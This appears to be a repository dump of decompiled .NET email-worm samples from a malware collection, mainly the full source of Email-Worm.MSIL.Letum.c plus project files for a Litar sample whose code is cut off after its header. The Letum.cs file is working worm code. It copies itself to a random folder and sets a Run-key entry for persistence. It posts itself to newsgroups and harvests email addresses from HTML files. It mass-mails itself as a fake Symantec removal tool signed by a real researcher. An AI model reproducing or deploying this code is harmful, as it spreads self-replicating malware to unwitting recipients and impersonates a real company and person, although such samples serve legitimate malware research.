@@ -0,0 +1,19 @@
// Decompiled with JetBrains decompiler
// Type: Letum.Properties.Settings
// Assembly: Letum, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 824230F4-E564-4DC3-8691-5A3025A33873
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.a-9af12e4a61232f77b3d3dcd858881a2180caf99ae263ac3af4ff71bbc5547079.exe
using System.Configuration;
using System.Runtime.CompilerServices;
namespace Letum.Properties
{
[CompilerGenerated]
internal sealed class Settings : ApplicationSettingsBase
{
private static Settings defaultInstance = new Settings();
public static Settings Default => Settings.defaultInstance;
}
}
MSIL/Email-Worm/MSIL/L/Email-Worm.MSIL.Letum.c-4bd65854e1fc8771506bbe03c7439b7af842a936a933642f2538f5e68812d29c/AssemblyInfo.cs
+14
View File
@@ -0,0 +1,14 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: ComVisible(false)]
[assembly: AssemblyCopyright("Copyright © 2006")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: Guid("9c6ecbe9-0863-4001-8a94-b8cc1b696c55")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("Letum")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("Letum")]
[assembly: AssemblyVersion("1.0.0.0")]
MSIL/Email-Worm/MSIL/L/Email-Worm.MSIL.Letum.c-4bd65854e1fc8771506bbe03c7439b7af842a936a933642f2538f5e68812d29c/Email-Worm.MSIL.Letum.c.csproj
+47
View File
@@ -0,0 +1,47 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.c-4bd65854e1fc8771506bbe03c7439b7af842a936a933642f2538f5e68812d29c.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{BA5580B7-C204-4CE5-AF70-F5C79C363064}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Letum</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>Letum</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Letum22\Letum.cs" />
<Compile Include="Form1.cs" />
<Compile Include="Properties\Resources.cs" />
<Compile Include="Properties\Settings.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Properties\Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Email-Worm/MSIL/L/Email-Worm.MSIL.Letum.c-4bd65854e1fc8771506bbe03c7439b7af842a936a933642f2538f5e68812d29c/Email-Worm.MSIL.Letum.c.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Letum", "Email-Worm.MSIL.Letum.c-4bd65854e1fc8771506bbe03c7439b7af842a936a933642f2538f5e68812d29c.csproj", "{BA5580B7-C204-4CE5-AF70-F5C79C363064}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{BA5580B7-C204-4CE5-AF70-F5C79C363064}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{BA5580B7-C204-4CE5-AF70-F5C79C363064}.Debug|Any CPU.Build.0 = Debug|Any CPU
{BA5580B7-C204-4CE5-AF70-F5C79C363064}.Release|Any CPU.ActiveCfg = Release|Any CPU
{BA5580B7-C204-4CE5-AF70-F5C79C363064}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Email-Worm/MSIL/L/Email-Worm.MSIL.Letum.c-4bd65854e1fc8771506bbe03c7439b7af842a936a933642f2538f5e68812d29c/Form1.cs
+32
View File
@@ -0,0 +1,32 @@
// Decompiled with JetBrains decompiler
// Type: Letum.Form1
// Assembly: Letum, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 221BE71B-F8E4-4988-810C-E676D4789C8D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.c-4bd65854e1fc8771506bbe03c7439b7af842a936a933642f2538f5e68812d29c.exe
using System.ComponentModel;
using System.Windows.Forms;
namespace Letum
{
public class Form1 : Form
{
private IContainer components = (IContainer) null;
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.components = (IContainer) new Container();
this.AutoScaleMode = AutoScaleMode.Font;
this.Text = nameof (Form1);
}
public Form1() => this.InitializeComponent();
}
}
MSIL/Email-Worm/MSIL/L/Email-Worm.MSIL.Letum.c-4bd65854e1fc8771506bbe03c7439b7af842a936a933642f2538f5e68812d29c/Letum22/Letum.cs
+261
View File
@@ -0,0 +1,261 @@
// Decompiled with JetBrains decompiler
// Type: Letum22.Letum
// Assembly: Letum, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 221BE71B-F8E4-4988-810C-E676D4789C8D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.c-4bd65854e1fc8771506bbe03c7439b7af842a936a933642f2538f5e68812d29c.exe
using Microsoft.Win32;
using System;
using System.Collections;
using System.IO;
using System.Net.Sockets;
using System.Reflection;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading;
using System.Windows.Forms;
namespace Letum22
{
public class Letum
{
private static Module self;
private static string pferrie = "peter_ferrie@symantec.com";
private static string[] nSubject = new string[7]
{
"Warning!",
"Virus Alert",
"Customer Support",
"Re:",
"Re:Warning",
nameof (Letum),
"Virus Report"
};
private static string[] nData = new string[3]
{
"Dear Users\r\n\r\nDue to the high increase of the Letum worm, we have upgraded it to Category B. Please use our attached removal tool to scan and disinfect your computer from the malware.\r\n\r\n Regards\r\n Security Response",
"Hiya,\r\n\r\n I've found this tool a couple of weeks ago, and after using it i was surprised on how good it was on squashing viruses. I wonder if avers know about this? ;)",
">>\r\n Maybe not but try this, i'm sure it will help you in your fight against malware. The engine it uses isnt to bad, but the searching speed is very fast for such a small size "
};
private static ArrayList List = new ArrayList();
[STAThread]
private static void Main()
{
Random random = new Random();
Thread thread1 = new Thread(new ThreadStart(Letum.nntp));
Thread thread2 = new Thread(new ThreadStart(Letum.smtp));
Letum.self = Assembly.GetExecutingAssembly().GetModules()[0];
Letum.CollectDirs("C:\\", Letum.List);
int index = random.Next(0, Letum.List.Count);
string str = Letum.List[index].ToString();
RegistryKey registryKey1 = Registry.CurrentUser.OpenSubKey("Software\\Retro", true);
if (registryKey1 == null)
{
registryKey1 = Registry.CurrentUser.CreateSubKey("Software\\Retro");
registryKey1.SetValue(nameof (Letum), (object) (str + "\\" + Letum.self.ScopeName));
File.Copy(Letum.self.FullyQualifiedName, str.ToString() + "\\" + Letum.self.ScopeName);
}
File.Delete(registryKey1.GetValue(nameof (Letum)).ToString());
File.Copy(Letum.self.FullyQualifiedName, str.ToString() + "\\" + Letum.self.ScopeName);
registryKey1.SetValue(nameof (Letum), (object) (str + "\\" + Letum.self.ScopeName));
RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
registryKey2.SetValue(nameof (Letum), (object) (str + "\\" + Letum.self.ScopeName));
registryKey2.Close();
thread1.Start();
thread2.Start();
if (random.Next(0, 1983) != random.Next(0, 1983))
return;
int num = (int) MessageBox.Show("Dear Peter Ferrie \n\nGeNeTiX is a person not a f**king genetically modified food product. \nShe's not happy you called her that! \n\nRegards", "Name Entry Error", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
}
private static void nntp()
{
TcpClient tcpClient = new TcpClient();
ArrayList arrayList = new ArrayList();
StringBuilder stringBuilder = new StringBuilder();
Random random = new Random();
int startIndex1 = 0;
object obj1 = (object) null;
foreach (string subKeyName in Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager\\Accounts").GetSubKeyNames())
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager\\Accounts\\" + subKeyName);
foreach (string valueName in registryKey.GetValueNames())
{
if (valueName == "NNTP Server")
obj1 = registryKey.GetValue("NNTP Server");
}
}
if (obj1 == null)
;
try
{
tcpClient.Connect("news.microsoft.com", 119);
}
catch
{
return;
}
NetworkStream stream = tcpClient.GetStream();
StreamReader streamReader = new StreamReader((Stream) stream);
StreamWriter streamWriter = new StreamWriter((Stream) stream);
streamWriter.AutoFlush = true;
if (streamReader.ReadLine().Substring(0, 3) != "200")
{
streamWriter.WriteLine("LIST");
string text = streamReader.ReadLine();
int num = (int) MessageBox.Show(text);
while (text != ".")
{
text = streamReader.ReadLine();
if (text != ".")
{
text = text.Substring(0, text.IndexOf(" "));
arrayList.Add((object) text);
}
}
int index1 = random.Next(0, arrayList.Count);
object obj2 = arrayList[index1];
streamWriter.WriteLine("GROUP " + obj2);
if (streamReader.ToString().Substring(0, 3) != "211")
{
streamWriter.WriteLine("POST");
if (streamReader.ToString().Substring(0, 3) != "340")
{
int index2 = random.Next(0, Letum.nSubject.Length);
string str1 = Letum.nSubject[index2];
int index3 = random.Next(0, Letum.nData.Length);
string str2 = Letum.nData[index3] + "\r\n\r\n";
FileStream fileStream = new FileStream(Letum.self.ScopeName, FileMode.Open, FileAccess.Read);
byte[] numArray = new byte[fileStream.Length];
fileStream.Read(numArray, 0, (int) fileStream.Length);
fileStream.Close();
string str3 = Encoding.ASCII.GetString(numArray);
string str4 = string.Empty;
if (str3.Length % 3 != 0)
{
string str5 = new string(' ', 3 - str3.Length % 3);
str3 += str5;
}
int length = str3.Length;
for (int startIndex2 = 1; startIndex2 <= length; startIndex2 += 3)
str4 = str4 + Convert.ToString((char) ((int) Convert.ToChar(str3.Substring(startIndex2 - 1, 1)) / 4 + 32)) + Convert.ToString((char) ((int) Convert.ToChar(str3.Substring(startIndex2 - 1, 1)) % 4 * 16 + (int) Convert.ToChar(str3.Substring(startIndex2, 1)) / 16 + 32)) + Convert.ToString((char) ((int) Convert.ToChar(str3.Substring(startIndex2, 1)) % 16 * 4 + (int) Convert.ToChar(str3.Substring(startIndex2 + 1, 1)) / 64 + 32)) + Convert.ToString((char) ((int) Convert.ToChar(str3.Substring(startIndex2 + 1, 1)) % 64 + 32));
int count;
for (string str6 = str4.Replace(' ', '`'); startIndex1 < str6.Length; startIndex1 += count)
{
count = Math.Min(60, str6.Length - startIndex1);
stringBuilder.Append("M");
stringBuilder.Append(str6, startIndex1, count);
stringBuilder.Append("\r\n");
}
string str7 = stringBuilder.ToString();
string str8 = str7.Remove(str7.LastIndexOf("M"), 1);
string str9 = "FROM: " + Letum.pferrie + "\r\nNEWSGROUPS: " + obj2 + "\r\nSUBJECT: " + str1 + "\r\n\r\n" + (object) Letum.nData + "begin 644 " + Letum.self.ScopeName + "\r\n" + str8 + "\r\n'\r\nend\r\n.";
streamWriter.WriteLine(str9);
if (streamReader.ReadLine().Substring(0, 3) != "240")
tcpClient.Close();
}
}
}
tcpClient.Close();
}
private static void smtp()
{
TcpClient tcpClient = new TcpClient();
StringBuilder stringBuilder = new StringBuilder();
Random random = new Random();
object hostname = (object) null;
int startIndex = 0;
string str1 = "----=_NextPart_81_27_24";
string str2 = "<html><head></head><body bgcolor=\"white\" text=\"black\" link=\"blue\" vlink=\"purple\" alink=\"red\"><table border=\"0\" width=\"780\" bgcolor=\"white\"><tr><td width=\"154\" valign=\"top\" bgcolor=\"white\"><p>&nbsp; <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=\"154\"><p>&nbsp;<a href=\"http://www.symantec.com\"><img src=\"http://www.langtech.com/images/projects/symantec_logoESP.gif\" border=\"0\"></a></p><p>&nbsp;</td></tr><tr><td width=\"154\" background=\"http://security.symantec.com/sscv6/languageContent/ie/sym/images/us.navbar.background.gif\"><p>&nbsp;</p><p><font face=\"Verdana\" size=\"1\"><a href=\"http://www.symantec.com/legal/legal_note.html\">Legal Notices</a></font><font face=\"Verdana\" size=\"1\"> <br clear=\"all\"></font><font face=\"Verdana\" size=\"1\"><a href=\"http://www.symantec.com/legal/privacy.html\">Privacy Policy</a></font></p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</td></tr></table><p>&nbsp;</td><td width=\"618\" valign=\"top\" bgcolor=\"white\"><p align=\"left\"><font face=\"Verdana\" size=\"2\"><br></font></p><p align=\"left\">&nbsp;</p><p align=\"left\">&nbsp; <div align=\"center\"><table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"80%\"><tr><td width=\"616\"><p align=\"left\">&nbsp;</p><p align=\"left\"><font face=\"Verdana\" size=\"2\">Dear User,</font></p><p align=\"left\"><font face=\"Verdana\" size=\"2\">Due to the high increase of the Letum worm, we have upgraded it to Category B. Please use our attached removal tool to scan and disinfect your computer from the malware.</font></p><p align=\"left\"><font face=\"Verdana\" size=\"2\">If you have any comments or questions about this, then please contact us.</font></p><p align=\"left\"><font face=\"Verdana\" size=\"2\">Regards</font></p><p align=\"left\"><font face=\"Verdana\" size=\"2\">Peter Ferrie<br clear=\"all\"></font><font face=\"Verdana\" size=\"1\">Senior Anti-Virus Researcher / Senior Principal Software Engineer&nbsp;</font></td></tr></table></div><p align=\"left\"></p><p align=\"left\"><div align=\"center\"><table border=\"0\" cellspacing=\"1\" width=\"100%\"><tr><td width=\"100%\" bgcolor=\"white\"><p align=\"center\"><font face=\"Verdana\" size=\"1\"><B>©1995 - 2006 Symantec Corporation All rights reserved.</font></td></B></tr></table></div></td></tr></table><p></p></body></html>";
foreach (string subKeyName in Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager").GetSubKeyNames())
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager\\" + subKeyName, true);
hostname = registryKey.GetValue("SMTP Server") != null ? registryKey.GetValue("SMTP Server") : (object) "mail.primaryhost.org.uk";
}
FileStream fileStream1 = new FileStream(Registry.CurrentUser.OpenSubKey("Software\\Retro", true).GetValue(nameof (Letum)).ToString(), FileMode.Open, FileAccess.Read);
byte[] numArray1 = new byte[fileStream1.Length];
fileStream1.Read(numArray1, 0, (int) fileStream1.Length);
fileStream1.Close();
int count;
for (string base64String = Convert.ToBase64String(numArray1); startIndex < base64String.Length; startIndex += count)
{
count = Math.Min(76, base64String.Length - startIndex);
stringBuilder.Append(base64String, startIndex, count);
stringBuilder.Append("\r\n");
}
tcpClient.Connect((string) hostname, 25);
NetworkStream stream = tcpClient.GetStream();
StreamReader streamReader = new StreamReader((Stream) tcpClient.GetStream());
StreamWriter streamWriter = new StreamWriter((Stream) stream);
streamWriter.AutoFlush = true;
if (streamReader.ToString().Substring(0, 3) != "220")
{
streamWriter.WriteLine("HELO localhost\r\n");
if (streamReader.ToString().Substring(0, 3) != "250")
{
try
{
foreach (string path in Letum.List)
{
foreach (string file in Directory.GetFiles(path, "*html"))
{
Regex regex = new Regex("[a-zA-Z0-9-_.-]+@[a-zA-Z0-9-_.-]+\\.[a-zA-Z0-9]+");
FileStream fileStream2 = new FileStream(file, FileMode.Open, FileAccess.Read);
byte[] numArray2 = new byte[fileStream2.Length];
fileStream2.Read(numArray2, 0, (int) fileStream2.Length);
fileStream2.Close();
foreach (Match match in regex.Matches(Encoding.ASCII.GetString(numArray2)))
{
streamWriter.WriteLine("MAIL FROM: " + Letum.pferrie);
if (streamReader.ToString().Substring(0, 3) != "250")
{
streamWriter.WriteLine("RCPT TO: " + (object) match);
if (streamReader.ToString().Substring(0, 3) != "250")
{
streamWriter.WriteLine("DATA");
if (streamReader.ToString().Substring(0, 3) != "354")
{
"FROM: Symantec Security Response <" + Letum.pferrie + ">\r\nTO: <" + (object) match + "> " + (object) match + "SUBJECT: " + Letum.nSubject[random.Next(0, Letum.nSubject.Length)] + "\r\nMIME-Version: 1.0\r\nContent-Type: multipart/mixed;\r\n\tboundary=\"" + str1 + "\"X-Priority: 3\r\nX-MSMail-Priority: Normal\r\nX-Mailer: Microsoft Outlook Express 6.00.2900.2180\r\nX-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180\r\n\r\nThis is a multi-part message in MIME format.\r\n--" + str1 + "\r\nContent-Type: text/html;\r\n\tcharset\"iso-8859-1\"\r\nContent-Transfer-Encoding: 7bit\r\n\r\n" + str2 + "\r\n--" + str1 + "\r\nContent-Type: application/octet-stream;\r\n\tname=\"test.exe\"\r\nContent-Transfer-Encoding: base64\r\nContent-Disposition: attachment;\r\n\tfilename=\"test.exe\"\r\n\r\n" + (object) stringBuilder + "\r\n\r\n--" + str1 + "--\r\n.\r\n";
if (!(streamReader.ToString().Substring(0, 3) != "250"))
{
int num1 = 0;
if (num1 < 5)
{
tcpClient.Close();
Letum.smtp();
int num2 = num1 + 1;
}
}
}
}
}
}
}
}
}
catch (UnauthorizedAccessException ex)
{
}
}
}
tcpClient.Close();
}
private static void CollectDirs(string dir, ArrayList storage)
{
try
{
foreach (string directory in Directory.GetDirectories(dir))
{
storage.Add((object) directory);
Letum.CollectDirs(directory, storage);
}
}
catch (UnauthorizedAccessException ex)
{
}
}
}
}
MSIL/Email-Worm/MSIL/L/Email-Worm.MSIL.Letum.c-4bd65854e1fc8771506bbe03c7439b7af842a936a933642f2538f5e68812d29c/Properties/Resources.cs
+44
View File
@@ -0,0 +1,44 @@
// Decompiled with JetBrains decompiler
// Type: Letum.Properties.Resources
// Assembly: Letum, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 221BE71B-F8E4-4988-810C-E676D4789C8D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.c-4bd65854e1fc8771506bbe03c7439b7af842a936a933642f2538f5e68812d29c.exe
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace Letum.Properties
{
[DebuggerNonUserCode]
[CompilerGenerated]
internal class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
internal Resources()
{
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (Letum.Properties.Resources.resourceMan == null)
Letum.Properties.Resources.resourceMan = new ResourceManager("Letum.Properties.Resources", typeof (Letum.Properties.Resources).Assembly);
return Letum.Properties.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => Letum.Properties.Resources.resourceCulture;
set => Letum.Properties.Resources.resourceCulture = value;
}
}
}
MSIL/Email-Worm/MSIL/L/Email-Worm.MSIL.Letum.c-4bd65854e1fc8771506bbe03c7439b7af842a936a933642f2538f5e68812d29c/Properties/Resources.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/Email-Worm/MSIL/L/Email-Worm.MSIL.Letum.c-4bd65854e1fc8771506bbe03c7439b7af842a936a933642f2538f5e68812d29c/Properties/Settings.cs
+26
View File
@@ -0,0 +1,26 @@
// Decompiled with JetBrains decompiler
// Type: Letum.Properties.Settings
// Assembly: Letum, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 221BE71B-F8E4-4988-810C-E676D4789C8D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.c-4bd65854e1fc8771506bbe03c7439b7af842a936a933642f2538f5e68812d29c.exe
using System.Configuration;
using System.Runtime.CompilerServices;
namespace Letum.Properties
{
[CompilerGenerated]
internal sealed class Settings : ApplicationSettingsBase
{
private static Settings defaultInstance = new Settings();
public static Settings Default
{
get
{
Settings defaultInstance = Settings.defaultInstance;
return defaultInstance;
}
}
}
}
MSIL/Email-Worm/MSIL/L/Email-Worm.MSIL.Litar-f42270356f25e0fc4def19fc2589ed7ebdd6dda94d7d6c5bcbfeef3d3f1545fd/AssemblyInfo.cs
+13
View File
@@ -0,0 +1,13 @@
using System;
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCopyright("")]
[assembly: AssemblyTitle("")]
[assembly: CLSCompliant(true)]
[assembly: AssemblyProduct("")]
[assembly: AssemblyDescription("")]
[assembly: Guid("A2840898-9532-490E-8EC6-A49A97DD6F3A")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyVersion("1.0.797.9891")]
MSIL/Email-Worm/MSIL/L/Email-Worm.MSIL.Litar-f42270356f25e0fc4def19fc2589ed7ebdd6dda94d7d6c5bcbfeef3d3f1545fd/Email-Worm.MSIL.Litar.csproj
+43
View File
@@ -0,0 +1,43 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Litar-f42270356f25e0fc4def19fc2589ed7ebdd6dda94d7d6c5bcbfeef3d3f1545fd.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{9338A72F-0480-414E-8A25-9D739143F29B}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>LoveYou</AssemblyName>
<ApplicationVersion>1.0.797.9891</ApplicationVersion>
<RootNamespace>LoveYou</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Data" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Module1.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Email-Worm/MSIL/L/Email-Worm.MSIL.Litar-f42270356f25e0fc4def19fc2589ed7ebdd6dda94d7d6c5bcbfeef3d3f1545fd/Email-Worm.MSIL.Litar.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "LoveYou", "Email-Worm.MSIL.Litar-f42270356f25e0fc4def19fc2589ed7ebdd6dda94d7d6c5bcbfeef3d3f1545fd.csproj", "{9338A72F-0480-414E-8A25-9D739143F29B}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{9338A72F-0480-414E-8A25-9D739143F29B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{9338A72F-0480-414E-8A25-9D739143F29B}.Debug|Any CPU.Build.0 = Debug|Any CPU
{9338A72F-0480-414E-8A25-9D739143F29B}.Release|Any CPU.ActiveCfg = Release|Any CPU
{9338A72F-0480-414E-8A25-9D739143F29B}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Email-Worm/MSIL/L/Email-Worm.MSIL.Litar-f42270356f25e0fc4def19fc2589ed7ebdd6dda94d7d6c5bcbfeef3d3f1545fd/Module1.cs
+379
View File
@@ -0,0 +1,379 @@
// Decompiled with JetBrains decompiler
